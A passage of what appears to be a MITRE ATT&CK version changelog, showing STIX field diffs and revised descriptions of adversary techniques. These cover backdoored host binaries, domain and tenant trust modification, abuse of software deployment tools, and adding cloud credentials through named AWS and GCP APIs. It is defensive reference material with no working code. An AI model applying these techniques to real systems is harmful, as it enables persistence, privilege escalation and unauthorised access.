  x_mitre_attack_spec_version | 3.1.0                                    | 3.2.0
  x_mitre_version             | 1.0                                      | 2.0

iterable_item_added
  STIX Field           | Old value | New value
  x_mitre_contributors |           | Tamir Yehuda

iterable_item_removed
  STIX Field          | Old value                                                                                                                                                                                                                                                                                              | New value
  external_references | {'source_name': 'SpecterOps Lateral Movement from Azure to On-Prem AD 2020', 'description': 'Andy Robbins. (2020, August 17). Death from Above: Lateral Movement from Azure to On-Prem AD. Retrieved March 13, 2023.', 'url': 'https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d'} |
  x_mitre_platforms   | Azure AD                                                                                                                                                                                                                                                                                               |

[T1554] Compromise Host Software Binary

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description

Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers. Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021) Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.

New Description

Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications. Adversaries may establish persistence through modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
Details

values_changed
  STIX Field      | Old value                             | New value
  modified        | 2023-10-03 04:18:40.956000+00:00      | 2024-04-16 13:03:40.824000+00:00
  name            | Compromise Client Software Binary     | Compromise Host Software Binary
  description     | (old text, see Old Description above) | (new text, see New Description above)
  x_mitre_version | 1.1                                   | 2.0

[T1484] Domain or Tenant Policy Modification

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description

Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts. With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207). Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.

New Description

Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation. Modifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trust relationships between domains or tenants. With sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential malicious outcomes that can stem from this abuse. Examples of such abuse include:

* modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)
* modifying domain trusts to include an adversary-controlled domain, allowing adversaries to forge access tokens that will subsequently be accepted by victim domain resources(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)
* changing configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).
* adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant (Citation: Okta Cross-Tenant Impersonation 2023)

Adversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.

New Detections:

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_contributors | | ['Obsidian Security']
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-02-09 15:52:24.598000+00:00 | 2024-04-19 04:27:31.884000+00:00
name | Domain Policy Modification | Domain or Tenant Policy Modification
description | Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts. With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207). Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators. | Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation. Modifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants. With sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential attacks malicious outcomes that can stem from this abuse. Examples of such abuse include: * modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) * modifying domain trusts to include an adversary-controlled domain, allowing adversaries to forge access tokens that will subsequently be accepted by victim domain resources(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) * changing configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207). * adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant (Citation: Okta Cross-Tenant Impersonation 2023) Adversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.
x_mitre_version | 2.0 | 3.0
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'Okta Cross-Tenant Impersonation 2023', 'description': 'Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.', 'url': 'https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection'}
x_mitre_data_sources | | Application Log: Application Log Content
x_mitre_platforms | | SaaS

[T1072] Software Deployment Tools

Current version: 3.0

Version changed from: 2.2 → 3.0


Old Description
Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).

Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. Network infrastructure may also have administration tools that can be similarly abused by adversaries. (Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)

The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.

New Description
Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager.

Access to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.

SaaS-based configuration management services may allow for broad [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access Trojan)

Network infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)

The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to access specific functionality.
Details
values_changed
STIX Field | Old value | New value
modified | 2023-09-27 20:31:36.724000+00:00 | 2024-04-12 03:40:37.954000+00:00
description | Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. Network infrastructure may also have administration tools that can be similarly abused by adversaries. (Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation) The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose. | Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager. Access to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. SaaS-based configuration management services may allow for broad [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access Trojan) Network infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation) The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to access specific functionality.
x_mitre_version | 2.2 | 3.0
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'SpecterOps Lateral Movement from Azure to On-Prem AD 2020', 'description': 'Andy Robbins. (2020, August 17). Death from Above: Lateral Movement from Azure to On-Prem AD. Retrieved March 13, 2023.', 'url': 'https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d'}
external_references | | {'source_name': 'Mitiga Security Advisory: SSM Agent as Remote Access Trojan', 'description': 'Ariel Szarf, Or Aspir. (n.d.). Mitiga Security Advisory: Abusing the SSM Agent as a Remote Access Trojan. Retrieved January 31, 2024.', 'url': 'https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan'}
x_mitre_contributors | | Tamir Yehuda
x_mitre_platforms | | SaaS

[T1484.002] Domain or Tenant Policy Modification: Trust Modification

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain)

New Description
Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain)

An adversary may also add a new federated identity provider to an identity tenant such as Okta, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023)

New Detections:

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-21 16:09:14.555000+00:00 | 2024-04-19 04:27:51.388000+00:00
name | Domain Trust Modification | Trust Modification
description | Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) | Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) An adversary may also add a new federated identity provider to an identity tenant such as Okta, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023)
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 2.0
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'Okta Cross-Tenant Impersonation 2023', 'description': 'Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.', 'url': 'https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection'}
x_mitre_contributors | | Obsidian Security
x_mitre_data_sources | | Application Log: Application Log Content
x_mitre_platforms | | SaaS

Minor Version Changes

[T1548] Abuse Elevation Control Mechanism

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.

New Description
Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)

New Mitigations:

Details
values_changed
STIX Field | Old value | New value
modified | 2023-10-02 00:47:11.369000+00:00 | 2024-04-15 20:52:09.908000+00:00
description | Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system. | Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'TechNet How UAC Works', 'description': 'Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.', 'url': 'https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works'}
external_references | | {'source_name': 'OSX Keydnap malware', 'description': 'Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.', 'url': 'https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/'}
external_references | | {'source_name': 'Fortinet Fareit', 'description': 'Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.', 'url': 'https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware'}
external_references | | {'source_name': 'sudo man page 2018', 'description': 'Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.', 'url': 'https://www.sudo.ws/'}

[T1583] Acquire Infrastructure

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.

Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

New Description
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.

Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.
Details
values_changed
STIX Field | Old value | New value
modified | 2023-10-02 01:10:09.833000+00:00 | 2024-02-28 21:13:02.648000+00:00
description | Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase. Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down. | Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase. Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.
x_mitre_version | 1.3 | 1.4
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'Free Trial PurpleUrchin', 'description': 'Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.', 'url': 'https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/'}

[T1098.001] Account Manipulation: Additional Cloud Credentials

Current version: 2.7

Version changed from: 2.6 → 2.7


Old Description
Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.

For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)

In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)

Adversaries may also use the <code>CreateAccessKey</code> API in AWS or the <code>gcloud iam service-accounts keys create</code> command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation)

In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. (Citation: Crowdstrike AWS User Federation Persistence)

New Description
Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.

For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)

In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)

Adversaries may also use the <code>CreateAccessKey</code> API in AWS or the <code>gcloud iam service-accounts keys create</code> command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation)

In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. (Citation: Crowdstrike AWS User Federation Persistence)
Details
values_changed (STIX field: old value → new value)
modified: 2023-10-03 17:37:24.011000+00:00 → 2024-02-28 14:35:00.862000+00:00
description (old value): Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. (Citation: Crowdstrike AWS User Federation Persistence)
